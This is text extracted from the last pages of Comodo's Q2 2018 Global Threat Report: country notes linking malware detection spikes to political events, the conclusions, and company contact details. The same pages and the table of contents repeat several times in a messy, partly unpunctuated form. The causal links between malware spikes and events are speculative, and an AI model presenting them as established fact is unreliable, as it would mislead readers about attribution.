                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 67 of 73

75 Armenia

All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018

Global Threat Report Q2 2018 Edition

Page 68 of 73

76 Belarus

A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society

Global Threat Report Q2 2018 Edition

Page 69 of 73

77 Iraq

Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls

Global Threat Report Q2 2018 Edition

Page 70 of 73

78 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26

Global Threat Report Q2 2018 Edition

Page 71 of 73

79 Croatia

Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo

Global Threat Report Q2 2018 Edition

Page 72 of 73

710 Finland Russia USA

Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place

Global Threat Report Q2 2018 Edition

Page 73 of 73

8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples

Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims

Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data

Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures

NORTH AMERICA―

EUROPE―

ASIA―

REQUEST A DEMO Try Comodo Cybersecurity by speaking with

a security consultant to begin the process to set up a demo or proof-of-concept project

Contact us directly at +1 888-266-6361

copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC

VISIT COMODOCOM

Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom

Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772

Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin

Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190

countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more

than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing

millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day

The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential

threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine

learning-powered analytics artificial intelligence and human experts and insights to secure and protect

Comodo Cybersecurity customers business and public-sector partners and the public community

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository

About Comodo Cybersecurity

Brought to you by

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 68 of 73

76 Belarus

A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society

Global Threat Report Q2 2018 Edition

Page 69 of 73

77 Iraq

Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls

Global Threat Report Q2 2018 Edition

Page 70 of 73

78 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26

Global Threat Report Q2 2018 Edition

Page 71 of 73

79 Croatia

Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo

Global Threat Report Q2 2018 Edition

Page 72 of 73

710 Finland Russia USA

Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place

Global Threat Report Q2 2018 Edition

Page 73 of 73

8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in its persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and further mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating focus on hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies, and postures.

REQUEST A DEMO: Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC. VISIT COMODO.COM

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel: +1 (888) 551 1531. Tel: +1 (888) 266 6361. Int: +1 (703) 581 6361. Fax: +1 (973) 777 4394. sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel: +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel: +91 44 4562 2800. www.comodo.co.in

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


  • 1 Executive summary
    • 1.1 Overview
    • 1.2 New Trends
      • 1.2.1 Trojans jumped to the top of the malware list
      • 1.2.2 Cryptominers evolved into multifunctional malware
      • 1.2.3 Android malware skyrocketed in variety
      • 1.2.4 Geopolitical intelligence
  • 2 Trojans going on the offensive to hunt for confidential data
    • 2.1 The Most Widespread Trojan
    • 2.2 PowerShell-based attack with Emotet
    • 2.3 Flawed Ammyy RAT attack based on legitimate software
    • 2.4 The growth of Flawed Ammyy attacks for Q2
    • 2.5 Ammyy Admin dissemination around the world for Q2
  • 3 Cryptominer Evolution
    • Going Fileless, Killing Competitors, Crashing Systems
    • 3.1 BadShell attacks enterprises
    • 3.2 WinstarNssmMiner, a system killer
    • 3.3 CoinMiner kills rivals
    • 3.4 CoinHive changes its skin
    • 3.5 Cryptocurrency clipboard hijacker intercepts transfers
  • 4 Android Devices Under Siege
    • 4.1 Spying, Stealing, Mining
      • 4.1.1 KevDroid
      • 4.1.2 Zoo Park
      • 4.1.3 MikeSpy
      • 4.1.4 Xloader
      • 4.1.5 Stalker Spy
      • 4.1.6 Mystery Bot
      • 4.1.7 FakeSpy
      • 4.1.8 RedAlert
      • 4.1.9 Hero Rat
      • 4.1.10 Sonvpay
      • 4.1.11 CoinHive
    • 4.2 Android Malware Catalogued by Month
      • 4.2.1 April 2018
      • 4.2.2 May 2018
      • 4.2.3 June 2018
  • 5 Malware in Q2 2018: The Big Picture
    • 5.1 Strategic Threat: Computer Worms
      • 5.1.1 Generic Worms
      • 5.1.2 Net Worms
      • 5.1.3 Email Worms
      • 5.1.4 p2p Worms
      • 5.1.5 IM Worms
    • 5.2 High Threat Malware
      • 5.2.1 Backdoors
      • 5.2.2 Viruses
      • 5.2.3 Trojans
      • 5.2.4 Exploits
    • 5.3 Medium Threat Malware
      • 5.3.1 Constructor
      • 5.3.2 Packers
      • 5.3.3 Email Flooder
      • 5.3.4 Virtual Tools
      • 5.3.5 Jokes
    • 5.4 Low Threat Malware: Applications
      • 5.4.1 Applications
      • 5.4.2 Unwanted Applications
      • 5.4.3 Unsafe Applications
  • 6 Vertical analysis
  • 7 Geopolitical Intelligence
    • 7.1 USA
    • 7.2 China
    • 7.3 South Korea
    • 7.4 North Korea
    • 7.5 Armenia
    • 7.6 Belarus
    • 7.7 Iraq
    • 7.8 Ukraine
    • 7.9 Croatia
    • 7.10 Finland, Russia, USA
  • 8 Conclusions


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

Global Threat Report Q2 2018 Edition

Page 72 of 73

710 Finland Russia USA

Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place

Global Threat Report Q2 2018 Edition

Page 73 of 73

8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples

Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims

Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data

Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures

NORTH AMERICA―

EUROPE―

ASIA―

REQUEST A DEMO Try Comodo Cybersecurity by speaking with

a security consultant to begin the process to set up a demo or proof-of-concept project

Contact us directly at +1 888-266-6361

copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC

VISIT COMODOCOM

Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom

Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772

Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin

Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190

countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more

than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing

millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day

The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential

threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine

learning-powered analytics artificial intelligence and human experts and insights to secure and protect

Comodo Cybersecurity customers business and public-sector partners and the public community

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository

About Comodo Cybersecurity

Brought to you by

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 70 of 73

78 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26

Global Threat Report Q2 2018 Edition

Page 71 of 73

79 Croatia

Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo

Global Threat Report Q2 2018 Edition

Page 72 of 73

710 Finland Russia USA

Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place

Global Threat Report Q2 2018 Edition

Page 73 of 73

8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples

Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims

Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data

Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures

NORTH AMERICA―

EUROPE―

ASIA―

REQUEST A DEMO Try Comodo Cybersecurity by speaking with

a security consultant to begin the process to set up a demo or proof-of-concept project

Contact us directly at +1 888-266-6361

copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC

VISIT COMODOCOM

Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom

Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772

Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin

Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190

countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more

than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing

millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day

The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential

threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine

learning-powered analytics artificial intelligence and human experts and insights to secure and protect

Comodo Cybersecurity customers business and public-sector partners and the public community

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository

About Comodo Cybersecurity

Brought to you by

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
